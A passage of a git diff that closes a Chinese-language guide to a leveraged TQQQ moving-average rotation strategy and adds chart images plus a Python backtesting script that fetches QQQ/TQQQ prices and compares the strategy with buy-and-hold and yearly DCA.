这笔钱是否是你可以接受在最坏情况下损失70%以上、而不影响生活计划的资金?如果不是,LRS不适合。 + +**决策步骤二:确认执行能力。** 你是否能够承诺:无论市场新闻如何,只要信号出现就立即执行,不猜测、不犹豫、不覆盖?如果无法做到,LRS的实际收益将远低于回测结果。 + +**决策步骤三:确认仓位上限。** 基于你的总资产规模和风险承受力,确定LRS仓位的硬性上限(建议不超过可投资资产的30%),并将其写下来,作为未来任何市场情绪下都不得突破的约束。 + +**决策步骤四:选择账户类型。** 优先在IRA或Roth IRA账户中执行,以规避短期资本利得税对净收益的侵蚀。 + +**决策步骤五:设定评估周期。** 承诺至少执行满3年后再评估策略的有效性。3年以内的表现不足以判断策略的真实优劣,过早评估容易在震荡期放弃。 + +- 这个策略的价值不在于每年跑赢市场,而在于跨越完整周期后的复利积累 +- 最大的风险不是策略本身,而是在策略最需要你坚持的时刻选择放弃 +- 用你能承受失去的钱做高弹性的事,用你不能承受失去的钱做确定性的事 diff --git a/docs/LRS_notebooks/research/charts/chart_a_summary.png b/docs/LRS_notebooks/research/charts/chart_a_summary.png new file mode 100644 index 0000000..cfaaa05 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_a_summary.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_b_returns.png b/docs/LRS_notebooks/research/charts/chart_b_returns.png new file mode 100644 index 0000000..19e6382 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_b_returns.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_c_sharpe.png b/docs/LRS_notebooks/research/charts/chart_c_sharpe.png new file mode 100644 index 0000000..6c3e4cd Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_c_sharpe.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_d_drawdown.png b/docs/LRS_notebooks/research/charts/chart_d_drawdown.png new file mode 100644 index 0000000..9b51dac Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_d_drawdown.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_dca_5y_equity.png b/docs/LRS_notebooks/research/charts/chart_dca_5y_equity.png new file mode 100644 index 0000000..9551998 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_dca_5y_equity.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_e_equity.png b/docs/LRS_notebooks/research/charts/chart_e_equity.png new file mode 100644 index 0000000..9f9452f Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_e_equity.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_equity_10y_15y.png b/docs/LRS_notebooks/research/charts/chart_equity_10y_15y.png new file mode 100644 index 0000000..a4e29c6 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_equity_10y_15y.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_f_heatmap.png b/docs/LRS_notebooks/research/charts/chart_f_heatmap.png new file mode 100644 index 0000000..4ee45e3 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_f_heatmap.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_g_timeline.png b/docs/LRS_notebooks/research/charts/chart_g_timeline.png new file mode 100644 index 0000000..3b227b2 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_g_timeline.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_h_macro.png b/docs/LRS_notebooks/research/charts/chart_h_macro.png new file mode 100644 index 0000000..3a358d5 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_h_macro.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_i_ma_sensitivity.png b/docs/LRS_notebooks/research/charts/chart_i_ma_sensitivity.png new file mode 100644 index 0000000..a6ad486 Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_i_ma_sensitivity.png differ diff --git a/docs/LRS_notebooks/research/charts/chart_j_rolling.png b/docs/LRS_notebooks/research/charts/chart_j_rolling.png new file mode 100644 index 0000000..2ba744d Binary files /dev/null and b/docs/LRS_notebooks/research/charts/chart_j_rolling.png differ diff --git a/docs/LRS_notebooks/research/charts/generate_charts.py b/docs/LRS_notebooks/research/charts/generate_charts.py new file mode 100644 index 0000000..b0020c7 --- /dev/null +++ b/docs/LRS_notebooks/research/charts/generate_charts.py @@ -0,0 +1,1644 @@ +#!/usr/bin/env python3 +"""Generate static PNG charts for LRS TQQQ research HTML (Ch.3–Ch.4). + +Reuses core logic from web/pages/backtesting.py (no Streamlit). +LRS simulation: idle cash earns 4% annualized, compounded each trading day. +Outputs to this directory: chart_a_summary.png … chart_j_rolling.png +""" +from __future__ import annotations + +import math +from dataclasses import dataclass +from datetime import datetime, timedelta +from pathlib import Path + +import matplotlib.pyplot as plt +import numpy as np +import pandas as pd +import seaborn as sns +import yfinance as yf + +# ─── Paths ─────────────────────────────────────────────────────────────────── +HERE = Path(__file__).resolve().parent + +# ─── Matplotlib / CJK ──────────────────────────────────────────────────────── +plt.rcParams["font.sans-serif"] = [ + "PingFang SC", + "Hiragino Sans GB", + "Noto Sans CJK SC", + "Microsoft YaHei", + "SimHei", + "DejaVu Sans", +] +plt.rcParams["axes.unicode_minus"] = False + +# ─── Dark theme (aligned with strategy_shared.apply_dark_style) ───────────── +_DARK_BG = "#0f172a" +_AXES_BG = "#1e293b" +_GRID_COLOR = "#334155" +_TEXT_COLOR = "#cbd5e1" +_TICK_COLOR = "#94a3b8" + + +def _apply_dark(fig: plt.Figure, *axes) -> None: + fig.patch.set_facecolor(_DARK_BG) + for ax in axes: + ax.set_facecolor(_AXES_BG) + ax.tick_params(colors=_TICK_COLOR) + ax.xaxis.label.set_color(_TEXT_COLOR) + ax.yaxis.label.set_color(_TEXT_COLOR) + ax.title.set_color(_TEXT_COLOR) + for s in ax.spines.values(): + s.set_color(_GRID_COLOR) + ax.grid(True, color=_GRID_COLOR, alpha=0.45) + + +_INITIAL_CAPITAL = 10_000.0 +_COST_PER_SIDE = 1.99 +_DISTANCE_THRESH = 6.0 +_WHIPSAW_DAYS = 10 +_CASH_YIELD_ANNUAL = 0.04 +_CASH_YIELD_DAILY = (1.0 + _CASH_YIELD_ANNUAL) ** (1.0 / 252.0) + + +def _accrue_cash_yield(cash: float) -> float: + """Idle cash: 4% annual, compounded per trading day.""" + return cash * _CASH_YIELD_DAILY + +_PERIOD_SPECS: dict[str, dict] = { + "2y": { + "label": "近 2 年", + "fetch_type": "period", + "dl_period": "3y", + "target_days": 504, + }, + "3y": { + "label": "近 3 年", + "fetch_type": "period", + "dl_period": "4y", + "target_days": 756, + }, + "5y": { + "label": "近 5 年", + "fetch_type": "period", + "dl_period": "6y", + "target_days": 1260, + }, + "10y": { + "label": "近 10 年", + "fetch_type": "range", + "dl_start": None, + "dl_end": None, + "target_days": 2520, + }, + "15y": { + "label": "近 15 年", + "fetch_type": "range", + "dl_start": "2009-01-01", + "dl_end": None, + "target_days": 3780, + }, +} + +_PERIOD_ORDER = ["2y", "3y", "5y", "10y", "15y"] + + +def _norm_cols(df: pd.DataFrame) -> pd.DataFrame: + if isinstance(df.columns, pd.MultiIndex): + df = df.copy() + df.columns = df.columns.get_level_values(0) + return df + + +def _fetch_by_period(dl_period: str) -> tuple[pd.DataFrame, pd.DataFrame]: + qqq = yf.download("QQQ", period=dl_period, auto_adjust=True, progress=False) + tqqq = yf.download("TQQQ", period=dl_period, auto_adjust=True, progress=False) + return _norm_cols(qqq), _norm_cols(tqqq) + + +def _fetch_by_range(start: str, end: str) -> tuple[pd.DataFrame, pd.DataFrame]: + qqq = yf.download("QQQ", start=start, end=end, auto_adjust=True, progress=False) + tqqq = yf.download("TQQQ", start=start, end=end, auto_adjust=True, progress=False) + return _norm_cols(qqq), _norm_cols(tqqq) + + +def _ensure_ohlcv(qqq_df: pd.DataFrame, tqqq_df: pd.DataFrame) -> None: + if qqq_df is None or tqqq_df is None or qqq_df.empty or tqqq_df.empty: + raise RuntimeError("QQQ or TQQQ download returned empty data — retry later.") + if "Close" not in qqq_df.columns or "Close" not in tqqq_df.columns: + raise RuntimeError("Missing Close column in downloaded frames.") + + +def _fetch(period_key: str) -> tuple[pd.DataFrame, pd.DataFrame]: + spec = _PERIOD_SPECS[period_key] + if spec["fetch_type"] == "period": + return _fetch_by_period(spec["dl_period"]) + start = spec.get("dl_start") + end = spec.get("dl_end") + end_dt = datetime.now() + if end is None: + end = end_dt.strftime("%Y-%m-%d") + if start is None: + start_dt = end_dt - timedelta(days=365 * 11) + start = start_dt.strftime("%Y-%m-%d") + return _fetch_by_range(start, end) + + +def _get_effective_start( + qqq_full: pd.Series, + tqqq_full: pd.Series, + period_key: str, +) -> pd.Timestamp: + if len(tqqq_full.index) == 0: + raise RuntimeError("TQQQ series is empty — check download.") + spec = _PERIOD_SPECS[period_key] + if spec.get("eff_start"): + ts = pd.Timestamp(spec["eff_start"]) + return max(ts, qqq_full.index[0]) + n = spec.get("target_days", 504) + offset = max(0, len(qqq_full) - n) + eff = qqq_full.index[offset] + return max(eff, tqqq_full.index[0]) + + +def _streak(s: pd.Series) -> pd.Series: + groups = (s != s.shift()).cumsum() + return (s.groupby(groups).cumcount() + 1).where(s, 0) + + +def _build_signals(qqq_close: pd.Series, ma_len: int = 200) -> pd.DataFrame: + ma = qqq_close.rolling(ma_len).mean() + a1 = qqq_close > ma + slope = (ma - ma.shift(20)) / ma.shift(20) * 100 + a2 = slope > -0.5 + a3 = _streak(a1) >= 3 + signal = a1 & a2 & a3 + entry_signal = signal & ~signal.shift(1).fillna(False) + below = qqq_close < ma + exit_signal = below & below.shift(1).fillna(False) + cross = a1 & ~a1.shift(1).fillna(False) + return pd.DataFrame( + { + "qqq": qqq_close, + f"ma{ma_len}": ma, + "a1": a1, + "a2": a2, + "a3": a3, + "signal": signal, + "entry_signal": entry_signal, + "exit_signal": exit_signal, + "cross": cross, + } + ) + + +def _allocation(dist: float) -> tuple[str, float]: + if dist <= _DISTANCE_THRESH: + return "Direct Buy", 2 / 3 + if dist <= 15.0: + return "Split", 1 / 3 + return "Split(>15%)", 1 / 3 + + +@dataclass +class Trade: + entry_date: pd.Timestamp + entry_price: float + entry_mode: str + shares: float + cost_buy: float + exit_date: pd.Timestamp | None = None + exit_price: float | None = None + cost_sell: float = 0.0 + forced_exit: bool = False + + @property + def holding_days(self) -> int: + if self.exit_date is None: + return 0 + return (self.exit_date - self.entry_date).days + + @property + def gross_pnl(self) -> float: + if self.exit_price is None: + return 0.0 + return (self.exit_price - self.entry_price) * self.shares + + @property + def net_pnl(self) -> float: + return self.gross_pnl - self.cost_buy - self.cost_sell + + @property + def return_pct(self) -> float: + invested = self.entry_price * self.shares + self.cost_buy + return (self.net_pnl / invested * 100) if invested > 0 else 0.0 + + @property + def is_whipsaw(self) -> bool: + return self.holding_days <= _WHIPSAW_DAYS and self.net_pnl < 0 + + +def _simulate( + sig: pd.DataFrame, + tqqq_close: pd.Series, + trade_start: pd.Timestamp | None = None, +) -> tuple[list[Trade], pd.Series]: + tqqq = tqqq_close.reindex(sig.index, method="ffill") + cross_dates = sig.index[sig["cross"]].tolist() + cash = _INITIAL_CAPITAL + shares = 0.0 + in_pos = False + current: Trade | None = None + trades: list[Trade] = [] + equity: dict = {} + first_day = True + + for date in sig.index: + if trade_start is not None and date < trade_start: + continue + + cash = _accrue_cash_yield(cash) + + raw = tqqq.get(date) + if raw is None or (isinstance(raw, float) and math.isnan(raw)): + equity[date] = cash + shares * ( + float(tqqq.dropna().iloc[-1]) if shares > 0 else 0.0 + ) + first_day = False + continue + price = float(raw) + + if in_pos and current is not None and bool(sig.at[date, "exit_signal"]): + cash += shares * price - _COST_PER_SIDE + current.exit_date = date + current.exit_price = price + current.cost_sell = _COST_PER_SIDE + trades.append(current) + shares = 0.0 + in_pos = False + current = None + + is_entry = bool(sig.at[date, "entry_signal"]) + if first_day and not in_pos and bool(sig.at[date, "signal"]): + is_entry = True + first_day = False + + if not in_pos and is_entry: + prior = [d for d in cross_dates if d <= date] + cross_date = prior[-1] if prior else date + cross_raw = tqqq.get(cross_date) + cross_price = ( + float(cross_raw) + if cross_raw is not None and not math.isnan(float(cross_raw)) + else price + ) + dist = (price - cross_price) / cross_price * 100 if cross_price > 0 else 0.0 + mode, frac = _allocation(dist) + invest = cash * frac - _COST_PER_SIDE + if invest > 0: + n = math.floor(invest / price) + if n >= 1: + cash -= n * price + _COST_PER_SIDE + shares = float(n) + in_pos = True + current = Trade( + entry_date=date, + entry_price=price, + entry_mode=mode, + shares=shares, + cost_buy=_COST_PER_SIDE, + ) + equity[date] = cash + shares * price + + if in_pos and current is not None and shares > 0: + last_date = sig.index[-1] + last_price = float(tqqq.iloc[-1]) + cash += shares * last_price - _COST_PER_SIDE + current.exit_date = last_date + current.exit_price = last_price + current.cost_sell = _COST_PER_SIDE + current.forced_exit = True + trades.append(current) + equity[last_date] = cash + + return trades, pd.Series(equity) + + +def _max_dd(equity: pd.Series) -> float: + peak = equity.cummax() + return float(((equity - peak) / peak).min() * 100) + + +def _ts_key(ts: pd.Timestamp) -> pd.Timestamp: + return pd.Timestamp(ts).normalize() + + +def _january_first_trading_days( + index: pd.DatetimeIndex, + t_start: pd.Timestamp, + t_end: pd.Timestamp, + n: int = 5, +) -> list[pd.Timestamp]: + """First trading day of January for each year, only if in [t_start, t_end].""" + out: list[pd.Timestamp] = [] + for y in range(t_start.year, t_end.year + 1): + iy = index[index.year == y] + if len(iy) == 0: + continue + jan_first = iy[0] + if jan_first.month != 1: + continue + if jan_first < t_start or jan_first > t_end: + continue + out.append(jan_first) + if len(out) >= n: + break + return out + + +def _equity_dca_buyhold( + close: pd.Series, + idx: pd.DatetimeIndex, + contrib_dates: list[pd.Timestamp], + amount: float, +) -> pd.Series: + """Buy fractional shares at each contribution; 100% invested after each buy.""" + cset = {_ts_key(d) for d in contrib_dates} + shares = 0.0 + out: dict = {} + for date in idx: + if _ts_key(date) in cset: + p = float(close.loc[date]) + if p > 0: + shares += amount / p + out[date] = shares * float(close.loc[date]) + return pd.Series(out) + + +def _simulate_dca( + sig: pd.DataFrame, + tqqq_close: pd.Series, + trade_start: pd.Timestamp | None, + contrib_dates: list[pd.Timestamp], + contrib_amt: float = 2000.0, +) -> tuple[list[Trade], pd.Series]: + """Same LRS rules as _simulate, but cash receives `contrib_amt` on each contribution day.""" + tqqq = tqqq_close.reindex(sig.index, method="ffill") + cross_dates = sig.index[sig["cross"]].tolist() + cset = {_ts_key(d) for d in contrib_dates} + cash = 0.0 + shares = 0.0 + in_pos = False + current: Trade | None = None + trades: list[Trade] = [] + equity: dict = {} + first_day = True + + for date in sig.index: + if trade_start is not None and date < trade_start: + continue + + cash = _accrue_cash_yield(cash) + if _ts_key(date) in cset: + cash += contrib_amt + + raw = tqqq.get(date) + if raw is None or (isinstance(raw, float) and math.isnan(raw)): + equity[date] = cash + shares * ( + float(tqqq.dropna().iloc[-1]) if shares > 0 else 0.0 + ) + first_day = False + continue + price = float(raw) + + if in_pos and current is not None and bool(sig.at[date, "exit_signal"]): + cash += shares * price - _COST_PER_SIDE + current.exit_date = date + current.exit_price = price + current.cost_sell = _COST_PER_SIDE + trades.append(current) + shares = 0.0 + in_pos = False + current = None + + is_entry = bool(sig.at[date, "entry_signal"]) + if first_day and not in_pos and bool(sig.at[date, "signal"]): + is_entry = True + first_day = False + + if not in_pos and is_entry: + prior = [d for d in cross_dates if d <= date] + cross_date = prior[-1] if prior else date + cross_raw = tqqq.get(cross_date) + cross_price = ( + float(cross_raw) + if cross_raw is not None and not math.isnan(float(cross_raw)) + else price + ) + dist = (price - cross_price) / cross_price * 100 if cross_price > 0 else 0.0 + mode, frac = _allocation(dist) + invest = cash * frac - _COST_PER_SIDE + if invest > 0: + n = math.floor(invest / price) + if n >= 1: + cash -= n * price + _COST_PER_SIDE + shares = float(n) + in_pos = True + current = Trade( + entry_date=date, + entry_price=price, + entry_mode=mode, + shares=shares, + cost_buy=_COST_PER_SIDE, + ) + equity[date] = cash + shares * price + + if in_pos and current is not None and shares > 0: + last_date = sig.index[-1] + last_price = float(tqqq.iloc[-1]) + cash += shares * last_price - _COST_PER_SIDE + current.exit_date = last_date + current.exit_price = last_price + current.cost_sell = _COST_PER_SIDE + current.forced_exit = True + trades.append(current) + equity[last_date] = cash + + return trades, pd.Series(equity) + + +def _total_return_vs_principal(equity: pd.Series, principal: float) -> float: + return (float(equity.iloc[-1]) / principal - 1.0) * 100.0 + + +def _cagr_on_principal( + equity: pd.Series, principal: float, eff_start: pd.Timestamp | None = None +) -> float: + start_dt = eff_start if eff_start is not None else equity.index[0] + years = max((equity.index[-1] - start_dt).days / 365.25, 0.001) + fv = float(equity.iloc[-1]) + return ((fv / principal) ** (1.0 / years) - 1.0) * 100.0 + + +def run_dca_5y_analysis(r: dict | None = None) -> dict: + """DCA: $2,000 on each of 5 January first trading days; total $10,000. Window = 5y.""" + r = r if r is not None else run_period("5y") + t_start = r["t_start"] + qqq_eff = r["qqq_eff"] + t_end = qqq_eff.index[-1] + idx = qqq_eff.index + + contrib = _january_first_trading_days(idx, t_start, t_end, n=5) + if len(contrib) < 5: + raise RuntimeError( + f"Need 5 January contribution days in window; got {len(contrib)}: {contrib}" + ) + amt = 2000.0 + principal = 5 * amt + + # Full-history signals (same as run_from_frames / run_period) + qqq_df, tqqq_df = _fetch("5y") + _ensure_ohlcv(qqq_df, tqqq_df) + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + sig = _build_signals(qqq_full, ma_len=200) + + trades_dca, eq_dca = _simulate_dca(sig, tqqq_full, t_start, contrib, contrib_amt=amt) + eq_dca = eq_dca.reindex(idx, method="ffill").bfill() + + tqqq_eff = r["tqqq_eff"] + eq_qqq_dca = _equity_dca_buyhold(qqq_eff, idx, contrib, amt) + eq_tqq_dca = _equity_dca_buyhold(tqqq_eff, idx, contrib, amt) + + # Lump-sum (existing in r) + eq_lrs = r["equity"].reindex(idx, method="ffill").bfill() + bh_q = r["bh_qqq"].reindex(idx, method="ffill") + bh_t = r["bh_tqqq"].reindex(idx, method="ffill") + + dca_start = contrib[0] + ret = lambda eq, p=principal: _total_return_vs_principal(eq, p) + + def cagr_lump(eq: pd.Series) -> float: + return _cagr_on_principal(eq, principal, eff_start=t_start) + + def cagr_dca_m(eq: pd.Series) -> float: + return _cagr_on_principal(eq, principal, eff_start=dca_start) + + def sharpe_lump(eq: pd.Series) -> float: + sl = eq.loc[eq.index >= t_start] + daily_ret = sl.pct_change().dropna() + ann_vol = daily_ret.std() * (252**0.5) if len(daily_ret) > 1 else 1.0 + cg = cagr_lump(eq) / 100.0 + return (cg - 0.04) / ann_vol if ann_vol > 0 else 0.0 + + def sharpe_dca_m(eq: pd.Series) -> float: + sl = eq.loc[eq.index >= dca_start] + daily_ret = sl.pct_change().dropna() + ann_vol = daily_ret.std() * (252**0.5) if len(daily_ret) > 1 else 1.0 + cg = cagr_dca_m(eq) / 100.0 + return (cg - 0.04) / ann_vol if ann_vol > 0 else 0.0 + + def dd_lump(eq: pd.Series) -> float: + return _max_dd(eq.loc[eq.index >= t_start]) + + def dd_dca(eq: pd.Series) -> float: + return _max_dd(eq.loc[eq.index >= dca_start]) + + return { + "t_start": t_start, + "t_end": t_end, + "dca_start": dca_start, + "contrib_dates": contrib, + "principal": principal, + "idx": idx, + "eq_lrs_lump": eq_lrs, + "eq_qqq_lump": bh_q, + "eq_tqq_lump": bh_t, + "eq_lrs_dca": eq_dca, + "eq_qqq_dca": eq_qqq_dca, + "eq_tqq_dca": eq_tqq_dca, + "trades_dca": trades_dca, + "metrics": { + "lump": { + "LRS": { + "total_pct": ret(eq_lrs), + "cagr": cagr_lump(eq_lrs), + "sharpe": sharpe_lump(eq_lrs), + "max_dd": dd_lump(eq_lrs), + }, + "QQQ B&H": { + "total_pct": ret(bh_q), + "cagr": cagr_lump(bh_q), + "sharpe": sharpe_lump(bh_q), + "max_dd": dd_lump(bh_q), + }, + "TQQQ B&H": { + "total_pct": ret(bh_t), + "cagr": cagr_lump(bh_t), + "sharpe": sharpe_lump(bh_t), + "max_dd": dd_lump(bh_t), + }, + }, + "dca": { + "LRS": { + "total_pct": ret(eq_dca), + "cagr": cagr_dca_m(eq_dca), + "sharpe": sharpe_dca_m(eq_dca), + "max_dd": dd_dca(eq_dca), + "n_trades": len(trades_dca), + }, + "QQQ B&H": { + "total_pct": ret(eq_qqq_dca), + "cagr": cagr_dca_m(eq_qqq_dca), + "sharpe": sharpe_dca_m(eq_qqq_dca), + "max_dd": dd_dca(eq_qqq_dca), + }, + "TQQQ B&H": { + "total_pct": ret(eq_tqq_dca), + "cagr": cagr_dca_m(eq_tqq_dca), + "sharpe": sharpe_dca_m(eq_tqq_dca), + "max_dd": dd_dca(eq_tqq_dca), + }, + }, + }, + } + + +def run_dca_for_period(period_key: str) -> dict: + """DCA: $2,000 on each Jan 1st trading day in window, up to 5 times; principal = 2000 × n.""" + r = run_period(period_key) + t_start = r["t_start"] + qqq_eff = r["qqq_eff"] + t_end = qqq_eff.index[-1] + idx = qqq_eff.index + + contrib = _january_first_trading_days(idx, t_start, t_end, n=5) + if not contrib: + raise RuntimeError( + f"{period_key}: no January contribution days in [{t_start}, {t_end}]" + ) + + amt = 2000.0 + principal = float(len(contrib) * amt) + dca_start = contrib[0] + + qqq_df, tqqq_df = _fetch(period_key) + _ensure_ohlcv(qqq_df, tqqq_df) + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + sig = _build_signals(qqq_full, ma_len=200) + + trades_dca, eq_dca = _simulate_dca(sig, tqqq_full, t_start, contrib, contrib_amt=amt) + eq_dca = eq_dca.reindex(idx, method="ffill").bfill() + + eq_qqq_dca = _equity_dca_buyhold(qqq_eff, idx, contrib, amt) + eq_tqq_dca = _equity_dca_buyhold(r["tqqq_eff"], idx, contrib, amt) + + def total_pct(eq: pd.Series) -> float: + return _total_return_vs_principal(eq, principal) + + def cagr_d(eq: pd.Series) -> float: + return _cagr_on_principal(eq, principal, eff_start=dca_start) + + def sharpe_d(eq: pd.Series) -> float: + sl = eq.loc[eq.index >= dca_start] + daily_ret = sl.pct_change().dropna() + ann_vol = daily_ret.std() * (252**0.5) if len(daily_ret) > 1 else 1.0 + cg = cagr_d(eq) / 100.0 + return (cg - 0.04) / ann_vol if ann_vol > 0 else 0.0 + + def dd_d(eq: pd.Series) -> float: + return _max_dd(eq.loc[eq.index >= dca_start]) + + n = len(trades_dca) + wins = [t for t in trades_dca if t.net_pnl > 0] + wsaw = [t for t in trades_dca if t.is_whipsaw] + win_rate = (len(wins) / n * 100) if n > 0 else 0.0 + max_empty = _max_consecutive_empty_days(trades_dca, idx) + + return { + "period_key": period_key, + "label": _PERIOD_SPECS[period_key]["label"], + "idx": idx, + "trades_dca": trades_dca, + "eq_lrs_dca": eq_dca, + "eq_qqq_dca": eq_qqq_dca, + "eq_tqq_dca": eq_tqq_dca, + "contrib_dates": contrib, + "contrib_n": len(contrib), + "principal": principal, + "dca_start": dca_start, + "t_start": t_start, + "t_end": t_end, + "lrs": { + "total_pct": total_pct(eq_dca), + "cagr": cagr_d(eq_dca), + "sharpe": sharpe_d(eq_dca), + "max_dd": dd_d(eq_dca), + "n_trades": n, + "win_rate": win_rate, + "whipsaw": len(wsaw), + "max_empty": max_empty, + }, + "qqq": { + "total_pct": total_pct(eq_qqq_dca), + "cagr": cagr_d(eq_qqq_dca), + "sharpe": sharpe_d(eq_qqq_dca), + "max_dd": dd_d(eq_qqq_dca), + }, + "tqqq": { + "total_pct": total_pct(eq_tqq_dca), + "cagr": cagr_d(eq_tqq_dca), + "sharpe": sharpe_d(eq_tqq_dca), + "max_dd": dd_d(eq_tqq_dca), + }, + } + + +def run_dca_all_periods() -> list[dict]: + return [run_dca_for_period(k) for k in _PERIOD_ORDER] + + +def format_dca_compact_user_text(rows: list[dict]) -> str: + """与用户 lump-sum 表相同的紧凑拼接格式(DCA:每年1月首个交易日 $2000,窗口内最多5笔)。""" + hdr = "指标近2年近3年近5年近10年近15年" + + def pct5(key: str, sub: str) -> str: + return "".join(f"{r[sub][key]:+.1f}%" for r in rows) + + def sharpe5(sub: str) -> str: + return "".join(f"{r[sub]['sharpe']:.3f}" for r in rows) + + lrs_line = ( + hdr + + "总收益率" + + pct5("total_pct", "lrs") + + "CAGR" + + "".join(f"{r['lrs']['cagr']:+.1f}%" for r in rows) + + "Sharpe" + + sharpe5("lrs") + + "最大回撤" + + pct5("max_dd", "lrs") + + "交易次数" + + "/".join(str(r["lrs"]["n_trades"]) for r in rows) + + "胜率" + + "".join(f"{r['lrs']['win_rate']:.0f}%" for r in rows) + + "Whipsaw" + + "/".join(str(r["lrs"]["whipsaw"]) for r in rows) + + "最大连续空仓(交易日)" + + "/".join(str(r["lrs"]["max_empty"]) for r in rows) + ) + qqq_line = ( + hdr + + "总收益率" + + pct5("total_pct", "qqq") + + "CAGR" + + "".join(f"{r['qqq']['cagr']:+.1f}%" for r in rows) + + "Sharpe" + + sharpe5("qqq") + + "最大回撤" + + pct5("max_dd", "qqq") + ) + tqq_line = ( + hdr + + "总收益率" + + pct5("total_pct", "tqqq") + + "CAGR" + + "".join(f"{r['tqqq']['cagr']:+.1f}%" for r in rows) + + "Sharpe" + + sharpe5("tqqq") + + "最大回撤" + + pct5("max_dd", "tqqq") + ) + return "\n".join( + [ + "LRS 策略", + lrs_line, + "", + "QQQ 买入持有", + qqq_line, + "", + "TQQQ 买入持有", + tqq_line, + ] + ) + + +def format_dca_markdown_tables(rows: list[dict]) -> str: + """DCA 五窗口汇总:Markdown 表格(LRS 含闲置现金 4%;与 compact 文本同源)。""" + cols = ["指标", "近2年", "近3年", "近5年", "近10年", "近15年"] + + def md_row(cells: list[str]) -> str: + return "| " + " | ".join(str(c) for c in cells) + " |" + + def table_section(title: str, body: list[list[str]]) -> list[str]: + out = [f"### {title}", "", md_row(cols), md_row(["---"] * len(cols))] + for row in body: + out.append(md_row(row)) + return out + + lines: list[str] = [ + "## DCA 五窗口回测(近 2 / 3 / 5 / 10 / 15 年)", + "", + "**定投规则**:每年 **1 月首个交易日**投入 **$2,000**,窗口内最多 **5** 笔;总本金 = **$2,000 × 实际笔数**。", + "**LRS(DCA)**:空仓现金按年化 **4%**、每个**交易日**复利(与一次性投入回测一致);权益 = 现金 + TQQQ 持仓。", + "**QQQ / TQQQ(DCA)**:各笔全额换成分数股持有,**无**闲置现金计息。", + "**指标**:Sharpe = (CAGR − 4%) / 年化波动;CAGR、最大回撤自首次扣款日起算。", + "", + ] + + lrs_rows = [ + ["总收益率"] + [f"{r['lrs']['total_pct']:+.1f}%" for r in rows], + ["CAGR"] + [f"{r['lrs']['cagr']:+.1f}%" for r in rows], + ["Sharpe"] + [f"{r['lrs']['sharpe']:.3f}" for r in rows], + ["最大回撤"] + [f"{r['lrs']['max_dd']:+.1f}%" for r in rows], + ["交易次数"] + [str(r["lrs"]["n_trades"]) for r in rows], + ["胜率"] + [f"{r['lrs']['win_rate']:.0f}%" for r in rows], + ["Whipsaw"] + [str(r["lrs"]["whipsaw"]) for r in rows], + ["最大连续空仓(交易日)"] + [str(r["lrs"]["max_empty"]) for r in rows], + ["DCA 笔数"] + [str(r["contrib_n"]) for r in rows], + ["总本金($)"] + [f"{r['principal']:,.0f}" for r in rows], + ] + lines.extend(table_section("LRS 策略(DCA)", lrs_rows)) + lines.append("") + + qqq_rows = [ + ["总收益率"] + [f"{r['qqq']['total_pct']:+.1f}%" for r in rows], + ["CAGR"] + [f"{r['qqq']['cagr']:+.1f}%" for r in rows], + ["Sharpe"] + [f"{r['qqq']['sharpe']:.3f}" for r in rows], + ["最大回撤"] + [f"{r['qqq']['max_dd']:+.1f}%" for r in rows], + ["DCA 笔数"] + [str(r["contrib_n"]) for r in rows], + ["总本金($)"] + [f"{r['principal']:,.0f}" for r in rows], + ] + lines.extend(table_section("QQQ 买入持有(DCA)", qqq_rows)) + lines.append("") + + tqq_rows = [ + ["总收益率"] + [f"{r['tqqq']['total_pct']:+.1f}%" for r in rows], + ["CAGR"] + [f"{r['tqqq']['cagr']:+.1f}%" for r in rows], + ["Sharpe"] + [f"{r['tqqq']['sharpe']:.3f}" for r in rows], + ["最大回撤"] + [f"{r['tqqq']['max_dd']:+.1f}%" for r in rows], + ["DCA 笔数"] + [str(r["contrib_n"]) for r in rows], + ["总本金($)"] + [f"{r['principal']:,.0f}" for r in rows], + ] + lines.extend(table_section("TQQQ 买入持有(DCA)", tqq_rows)) + return "\n".join(lines) + + +def chart_dca_5y_equity(dca: dict, out: Path) -> None: + """Six curves: LRS/QQQ/TQQQ × lump vs DCA on one figure (two panels).""" + idx = dca["idx"] + fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(12, 8.0), sharex=True) + ax1.plot(idx, dca["eq_lrs_lump"].values, color="#38bdf8", lw=1.8, label="LRS lump") + ax1.plot(idx, dca["eq_qqq_lump"].values, color="#a78bfa", lw=1.4, ls="--", label="QQQ B&H lump") + ax1.plot(idx, dca["eq_tqq_lump"].values, color="#fb923c", lw=1.4, ls=":", label="TQQQ B&H lump") + ax1.set_ylabel("Portfolio ($)") + ax1.set_title("Lump sum $10,000 at window start — 5y effective window") + ax1.legend(loc="upper left", fontsize=7, ncol=3) + ax1.yaxis.set_major_formatter(plt.FuncFormatter(lambda x, _: f"${x:,.0f}")) + + ax2.plot(idx, dca["eq_lrs_dca"].values, color="#38bdf8", lw=1.8, label="LRS DCA") + ax2.plot(idx, dca["eq_qqq_dca"].values, color="#a78bfa", lw=1.4, ls="--", label="QQQ DCA") + ax2.plot(idx, dca["eq_tqq_dca"].values, color="#fb923c", lw=1.4, ls=":", label="TQQQ DCA") + for d in dca["contrib_dates"]: + ax2.axvline(d, color="#64748b", alpha=0.35, lw=0.9) + 